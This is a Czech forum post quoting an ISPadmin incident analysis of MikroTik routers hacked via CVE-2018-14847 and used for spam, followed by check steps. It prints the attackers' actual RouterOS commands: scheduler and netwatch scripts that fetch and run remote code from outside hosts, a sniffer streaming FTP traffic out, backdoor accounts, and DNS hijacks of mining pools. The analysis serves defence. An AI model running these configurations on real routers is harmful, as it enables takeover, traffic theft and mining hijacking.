Konecne Nieco rozumne od ISPadmina...po dlhej dobe. :
Jste si jistí, že nemáte v síti hacknutý MikroTik?
V poslední době jsme narazili na několik MikroTik routerů, které vypadaly na první pohled standardně (Běžel přes ně provoz. Bylo možné se na ně přihlásit pomocí Winboxu.), ale u kterých se při podrobnějším prozkoumání ukázalo, že odesílají spam přes SMTP protokol.
Pojďme se podívat na konkrétní příklad:
Během několika minut se v emailové frontě objevilo více než 50 000 emailů. To není v pořádku. Daný router používal MikroTik RouterOS ve verzi 6.42.7. Nicméně k hacknutí muselo dojít někdy mezi 1.8.2018 a 1.9.2018. V té době byla na routeru nainstalována verze 6.40.x. K upgradu na verzi 6.42.7 došlo později, kdy byl již router kompromitován.
Po analýze konfigurace routeru jsme zjistili, že na routeru byl zapnutý SOCKS server a přes něj byl celý router ovládán. SOCKS server běžel na portu 44550, ale je pravděpodobné, že používaný port může být na každém hacknutém routeru jiný.
Analýza routeru
1) SOCKS server povolen
/ip socks
set enabled=yes port=44550
2) Nová pravidla ve Firewallu
Ve firewallu byla spousta identických pravidel povolujících spojení na port 44550.
/ip firewall filter
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
Celkem zde bylo 71 stejných pravidel. Pravděpodobně se při každém úspěšném útoku přidalo jedno pravidlo. To znamená, že router byl napaden celkem 71krát.
3) Web proxy na portu 52107 povolena
/ip proxy
set anonymous=yes cache-on-disk=yes cache-path=web-proxy1 enabled=yes port=52107
4) Přidána pravidla pro přesměrování portů do NATu
/ip firewall nat
add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=\
149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=\
149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat dst-port=4444 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444
Při analýze síťového provozu je zřejmé, že na SOCKS server, na port 44550, se automaticky připojuje hned několik IP adres. Z dalších IP adres probíhalo skenování portů na otevřené služby.
5) Přidán účet pro připojení přes VPN
/ppp secret
add name=dodo password=dodo profile=dodo
6) Přidány statické DNS záznamy (Celý seznam je na konci dokumentu.)
Pokud měl nějaký počítač v síti nastavené DNS na napadený router, tak při pokusu o přístup na adresu ze seznamu byl cílový provoz přesměrován na úplně jinou IP adresu.
Přesměrování probíhalo na tyto adresy:
185.205.210.23
209.239.112.96
7) Načasované úlohy
/system scheduler
add interval=5m name=U5 on-event="/tool fetch url=http://ciskotik.com/poll/9b6\
482da-f83c-4573-af8b-d6b486188b85 mode=http dst-path=7xe7zt46hb08\r\
\n/import 7xe7zt46hb08" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
sep/06/2018 start-time=16
Scheduler se pokoušel stáhnout skript a ten následně spustit
URL 8) Další instalovaná vychytávka v Netwatch
/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
\n/tool fetch url=\"http://47.96.89.95/autosupout.rif\" dst-path=auto\
supout.rif\r\
\n 5\r\
\n/im autosupout.rif\r\
\n/file remove \r\
\n \r\
\n 3\r\
\n/tool netw en \r\
\n"
add comment=2 down-script="/tool net dis \r\
\n 30\r\
\n/tool net en " host=192.168.254.123 interval=3m30s \
timeout=1ms
URL http://47.96.89.95/autosupout.rif obsahuje skript
([ =0) do={
/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
\n/tool fetch url=\"http://47.96.89.95/autosupout.rif\" dst-path=autosu\
pout.rif\r\
\n 5\r\
\n/im autosupout.rif\r\
\n/file remove \r\
\n \r\
\n 3\r\
\n/tool netw en \r\
\n"
add disabled=yes comment=2 down-script="/tool net dis \r\
\n 30\r\
\n/tool net en " host=192.168.254.123 interval=3m30s \ timeout=1ms
}
(=false) do={/in l2tp-s ser set en=yes}
([ =0) do={/user add name=default pass=Jackk}
IP adresa 47.96.89.95 má podle Whois domov v Číně:
inetnum: 47.96.0.0 - 47.97.255.255
netname: ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country: CN
admin-c: ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
status: ALLOCATED PORTABLE
last-modified: 2015-02-27T01
source: APNIC
9) Sniffer
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp \
filter-port=ftp-data,ftp filter-stream=yes streaming-enabled=yes \
streaming-server=125.212.228.198
Cílová IP adresa 125.212.228.198 je podle Whois ve Vietnamu:
inetnum: 125.212.128.0 - 125.212.255.255
netname: VIETTEL-VN
descr: Viettel Group
descr: No 1, Tran Huu Duc street, My Dinh 2 ward, Nam Tu Liem district, Ha Noi City
country: VN
admin-c: TVT8-AP
tech-c: NDT9-AP
remarks: For spamming matters, mail to <--- e -->soc@viettel.com.vn<--- e -->
mnt-by: MAINT-VN-VNNIC
status: ALLOCATED PORTABLE
mnt-irt: IRT-VNNIC-AP
last-modified: 2017-11-11T09
source: APNIC
Díky Snifferu útočníci zjistili, který SMTP server se používá pro odesílání mailu a následně jej využili k odesílání spamů.
Ke kompromitaci routeru došlo s největší pravděpodobností přes Winbox (CVE-2018-14847). Z analýzy je patrné, že hackeři této zranitelnosti využili k tomu, aby následně mohli napadené routery použít ke svým zlovolným účelům. Bližší informace naleznete na https://blog.mikrotik.com/security/winb ... ility.html nebo https://n0p.me/winbox-bug-dissection/ .
Vzhledem k tomu, že ke kompromitaci routeru došlo dříve, tak po upgradu na verzi 6.42.7 byly všechny skripty a SOCKS server aktivní, takže router byl stále pod správou útočníků.
Doporučujeme provést kontrolu routerů:
1) Zkontrolujte aktivní služby: /system services
2) Zkontrolujte, zdali není aktivní SOCKS server: /ip socks
3) Zkontrolujte, zdali není aktivní Web proxy: /ip web proxy
4) Zkontrolujte skripty: /system scripts
5) Povolte SSH, Winbox a API přístup pouze z důvěryhodných IP adres
6) Udržujte aktuální verzi RouterOS
V ISPadminu 5.02 beta1 je možné otestovat, zdali na routeru neběží Web proxy, SOCKS server a/nebo Sniffer. Také je možné provést hromadnou aktualizaci RouterOS.
V Hardware / Routery / Router status / Dashboard najdete přehled routerů MikroTik. Jsou zde zobrazeny informace o instalovaných verzích RouterOS a o aktivních službách (/ip services). Taktéž jsou zde informace o tom, zdali je na některém routeru aktivní SOCKS server a/nebo Web proxy. Kliknutím na počet routerů se zobrazí detaily.
Pokud například kliknete na číslo v řádku Telnet a sloupci Celkem, budete přesměrováni na stránku s přehledem routerů, na kterých je spuštěn Telnet.
Pokud zaškrtnete příslušné checkboxy a z pop-up menu vyberete Aktualizovat Mikrotik OS, tak se u daných routerů provede upgrade na nejnovější verzi. Routery musí mít přístup k Internetu, aby si mohly stáhnout aktualizace. Bližší informace o aktualizaci routerů najdete na https://wiki.ispadmin.eu/cz/changelog/ispadmin-5-01
Výpis statických DNS
/ip dns static
add address=185.205.210.23 name=asia1.ethermine.org
add address=185.205.210.23 name=asia1.ethpool.org
add address=185.205.210.23 name=asia1.fullhashed.com
add address=185.205.210.23 name=asia2.ethermine.org
add address=185.205.210.23 name=cn.sparkpool.com
add address=185.205.210.23 name=aurorapool.net
add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com
add address=185.205.210.23 name=coinotron.com
add address=185.205.210.23 name=eth.1stpool.com
add address=185.205.210.23 name=eth.anorak.tech
add address=185.205.210.23 name=eth.2miners.com
add address=185.205.210.23 name=eth.antpool.com
add address=185.205.210.23 name=eth-ar.dwarfpool.com
add address=185.205.210.23 name=eth.arsmine.net
add address=185.205.210.23 name=eth-as.coinmine.pl
add address=185.205.210.23 name=eth-asia1.nanopool.org
add address=185.205.210.23 name=eth-br.dwarfpool.com
add address=185.205.210.23 name=eth.chileminers.cl
add address=185.205.210.23 name=eth.coinfoundry.org
add address=185.205.210.23 name=eth.coinmine.pl
add address=185.205.210.23 name=ethepool.com
add address=185.205.210.23 name=ether.bw.com
add address=185.205.210.23 name=etherdig.net
add address=185.205.210.23 name=ethereum.marshsoftware.ca
add address=185.205.210.23 name=ethereumpool.club
add address=185.205.210.23 name=ethergrab.us
add address=185.205.210.23 name=ethermine.ru
add address=185.205.210.23 name=ethertrench.com
add address=185.205.210.23 name=eth.ethertrench.com
add address=185.205.210.23 name=eth-eu1.nanopool.org
add address=185.205.210.23 name=eth-eu.coinmine.pl
add address=185.205.210.23 name=eth-eu.dwarfpool.com
add address=185.205.210.23 name=eth-eu.mining.sk
add address=185.205.210.23 name=eth-eu.pool.sexy
add address=185.205.210.23 name=eth.f2pool.com
add address=185.205.210.23 name=eth.gigantpool.com
add address=185.205.210.23 name=eth.gpumine.org
add address=185.205.210.23 name=eth-hk.dwarfpool.com
add address=185.205.210.23 name=eth.miningcity.org
add address=185.205.210.23 name=eth.mymininghub.com
add address=185.205.210.23 name=eth.pool.minergate.com
add address=185.205.210.23 name=eth.poolmining.org
add address=185.205.210.23 name=eth-pool.ucrypto.net
add address=185.205.210.23 name=eth.pool.zet-tech.eu
add address=185.205.210.23 name=eth-ru.dwarfpool.com
add address=185.205.210.23 name=eth-ru.edgestile.io
add address=185.205.210.23 name=eth-ru.mining.sk
add address=185.205.210.23 name=eth-sg.dwarfpool.com
add address=185.205.210.23 name=eth.soyminero.es
add address=185.205.210.23 name=eth.suprnova.cc
add address=185.205.210.23 name=eth.uleypool.com
add address=185.205.210.23 name=eth-us.coinmine.pl
add address=185.205.210.23 name=eth-us.dwarfpool.com
add address=185.205.210.23 name=eth-us-east1.nanopool.org
add address=185.205.210.23 name=eth-us.maxhash.org
add address=185.205.210.23 name=eth-us.pool.sexy
add address=185.205.210.23 name=eth-us-west1.nanopool.org
add address=185.205.210.23 name=eth.waterhole.io
add address=185.205.210.23 name=eth.xeminer.net
add address=185.205.210.23 name=eth.zion.net.co
add address=185.205.210.23 name=eu1.ethermine.org
add address=185.205.210.23 name=eu1.ethpool.org
add address=185.205.210.23 name=eu2.ethermine.org
add address=185.205.210.23 name=eu.99miners.com
add address=185.205.210.23 name=eu.ethmine.club
add address=185.205.210.23 name=eu.sparkpool.com
add address=185.205.210.23 name=huabei2-pool.ethfans.org
add address=185.205.210.23 name=huabei-pool.ethfans.org
add address=185.205.210.23 name=miningcity.org
add address=185.205.210.23 name=my.ethpool.net
add address=185.205.210.23 name=na-west.sparkpool.com
add address=185.205.210.23 name=na-east.sparkpool.com
add address=185.205.210.23 name=noobpool.com
add address=185.205.210.23 name=pool.ethfans.org
add address=185.205.210.23 name=pool.virtualmining.pt
add address=185.205.210.23 name=s.comining.io
add address=185.205.210.23 name=us1.ethermine.org
add address=185.205.210.23 name=us1.ethpool.org
add address=185.205.210.23 name=us2.ethermine.org
add address=185.205.210.23 name=us2.ethpool.org
add address=185.205.210.23 name=vaux-all.uk
add address=209.239.112.96 name=stratum.antpool.com
add address=209.239.112.96 name=stratum.slushpool.com
add address=209.239.112.96 name=cn.stratum.slushpool.com
add address=209.239.112.96 name=eu.stratum.slushpool.com
add address=209.239.112.96 name=jp-stratum.btcc.com
add address=209.239.112.96 name=mint.bitminter.com
add address=209.239.112.96 name=us.ss.btc.com
add address=209.239.112.96 name=na-west.sparkpool.com
add address=209.239.112.96 name=asia1.ethermine.org
add address=209.239.112.96 name=na-east.sparkpool.com
add address=209.239.112.96 name=asia1.ethpool.org
add address=209.239.112.96 name=tw.sparkpool.com
add address=209.239.112.96 name=asia1.fullhashed.com
add address=209.239.112.96 name=kr.sparkpool.com
add address=209.239.112.96 name=asia2.ethermine.org
add address=209.239.112.96 name=jp.sparkpool.com
add address=209.239.112.96 name=cn.sparkpool.com
add address=209.239.112.96 name=bitcoin.viabtc.com
add address=209.239.112.96 name=aurorapool.net
add address=209.239.112.96 name=stratum-us.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com
add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com
add address=209.239.112.96 name=stratum.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com
add address=209.239.112.96 name=stratum.btcguild.com
add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com
add address=209.239.112.96 name=stratum.btccpool.com
add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com
add address=209.239.112.96 name=stratum.btc.top
add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com
add address=209.239.112.96 name=coinotron.com
add address=209.239.112.96 name=eth.1stpool.com
add address=209.239.112.96 name=eth.anorak.tech
add address=209.239.112.96 name=eth.2miners.com
add address=209.239.112.96 name=eth.antpool.com
add address=209.239.112.96 name=eth-ar.dwarfpool.com
add address=209.239.112.96 name=eth.arsmine.net
add address=209.239.112.96 name=eth-as.coinmine.pl
add address=209.239.112.96 name=eth-asia1.nanopool.org
add address=209.239.112.96 name=eth-br.dwarfpool.com
add address=209.239.112.96 name=eth.chileminers.cl
add address=209.239.112.96 name=eth.coinfoundry.org
add address=209.239.112.96 name=eth.coinmine.pl
add address=209.239.112.96 name=ethepool.com
add address=209.239.112.96 name=ether.bw.com
add address=209.239.112.96 name=etherdig.net
add address=209.239.112.96 name=ethereum.marshsoftware.ca
add address=209.239.112.96 name=ethereumpool.club
add address=209.239.112.96 name=ethergrab.us
add address=209.239.112.96 name=ethermine.ru
add address=209.239.112.96 name=ethertrench.com
add address=209.239.112.96 name=eth.ethertrench.com
add address=209.239.112.96 name=eth-eu1.nanopool.org
add address=209.239.112.96 name=eth-eu.coinmine.pl
add address=209.239.112.96 name=eth-eu.dwarfpool.com
add address=209.239.112.96 name=eth-eu.mining.sk
add address=209.239.112.96 name=eth-eu.pool.sexy
add address=209.239.112.96 name=eth.f2pool.com
add address=209.239.112.96 name=eth.gigantpool.com
add address=209.239.112.96 name=eth.gpumine.org
add address=209.239.112.96 name=eth-hk.dwarfpool.com
add address=209.239.112.96 name=eth.miningcity.org
add address=209.239.112.96 name=eth.mymininghub.com
add address=209.239.112.96 name=eth.pool.minergate.com
add address=209.239.112.96 name=eth.poolmining.org
add address=209.239.112.96 name=eth-pool.ucrypto.net
add address=209.239.112.96 name=eth.pool.zet-tech.eu
add address=209.239.112.96 name=eth-ru.dwarfpool.com
add address=209.239.112.96 name=eth-ru.edgestile.io
add address=209.239.112.96 name=eth-ru.mining.sk
add address=209.239.112.96 name=eth-sg.dwarfpool.com
add address=209.239.112.96 name=eth.soyminero.es
add address=209.239.112.96 name=eth.suprnova.cc
add address=209.239.112.96 name=eth.uleypool.com
add address=209.239.112.96 name=eth-us.coinmine.pl
add address=209.239.112.96 name=eth-us.dwarfpool.com
add address=209.239.112.96 name=eth-us-east1.nanopool.org
add address=209.239.112.96 name=eth-us.maxhash.org
add address=209.239.112.96 name=eth-us.pool.sexy
add address=209.239.112.96 name=eth-us-west1.nanopool.org
add address=209.239.112.96 name=eth.waterhole.io
add address=209.239.112.96 name=eth.xeminer.net
add address=209.239.112.96 name=eth.zion.net.co
add address=209.239.112.96 name=eu1.ethermine.org
add address=209.239.112.96 name=eu1.ethpool.org
add address=209.239.112.96 name=eu2.ethermine.org
add address=209.239.112.96 name=eu.99miners.com
add address=209.239.112.96 name=eu.ethmine.club
add address=209.239.112.96 name=eu.sparkpool.com
add address=209.239.112.96 name=huabei2-pool.ethfans.org
add address=209.239.112.96 name=huabei-pool.ethfans.org
add address=209.239.112.96 name=miningcity.org
add address=209.239.112.96 name=my.ethpool.net
add address=209.239.112.96 name=noobpool.com
add address=209.239.112.96 name=pool.ethfans.org
add address=209.239.112.96 name=pool.virtualmining.pt
add address=209.239.112.96 name=s.comining.io
add address=209.239.112.96 name=us1.ethermine.org
add address=209.239.112.96 name=us1.ethpool.org
add address=209.239.112.96 name=us2.ethermine.org
add address=209.239.112.96 name=us2.ethpool.org
add address=209.239.112.96 name=vaux-all.uk